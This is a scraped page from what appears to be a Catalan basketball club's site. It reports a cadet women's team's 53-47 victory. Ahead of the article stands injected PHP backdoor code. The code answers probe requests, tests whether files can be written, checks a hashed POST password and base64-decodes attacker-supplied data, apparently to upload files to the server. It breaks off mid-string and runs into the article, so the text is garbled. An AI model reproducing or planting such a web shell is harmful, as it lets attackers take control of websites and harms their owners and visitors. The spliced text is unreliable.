function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" La reacció final del Cadet fem 09B val una nova victòria (53-47) - Tgn Bàsquet Club -

La reacció final del Cadet fem 09B val una nova victòria (53-47)

Updated: desembre 5, 2023

Partit corresponent novena jornada del nivell A de la categoria Cadet Femení Promoció Territorial.
Hi ha vegades que el més important és la victòria i d’altres el fet de saber patir per aconseguir-la. En aquest cas, coincideixen ambdós supòsits i això fa que el TGN 09B faci un pas rellevant en el reforç de la confiança i, a més, un salt cap a la part alta de la classificació tot i tenir encara un partit ajornat.

En els dos primers quarts, les liles de primer any, tot i fallar cistelles fàcils i massa tirs lliures, van estar en la línia habitual pel que fa a l’atac, però l’aspecte que enguany sobresurt per damunt dels altres, la defensa, no va aparèixer amb la intensitat necessària fins que quedaven tres minuts per acabar el tercer quart. A partir d’allí fins al final del partit, les visitants només van poder encistellar set punts.

Entre les coses a millorar, ser més fortes en l’aspecte físic i no defugir del contacte en el rebot. Per al contrari, cal destacar positivament la fe del col·lectiu. Jugui qui jugui, tot està al servei de l’equip, tot es fa en benefici de l’equip i poc a poc aquest es va enfortint.
Els següents partits, abans de les vacances de Nadal, seran força exigents contra l’Elisabeth CF Groc i contra l’AB Salle CBT.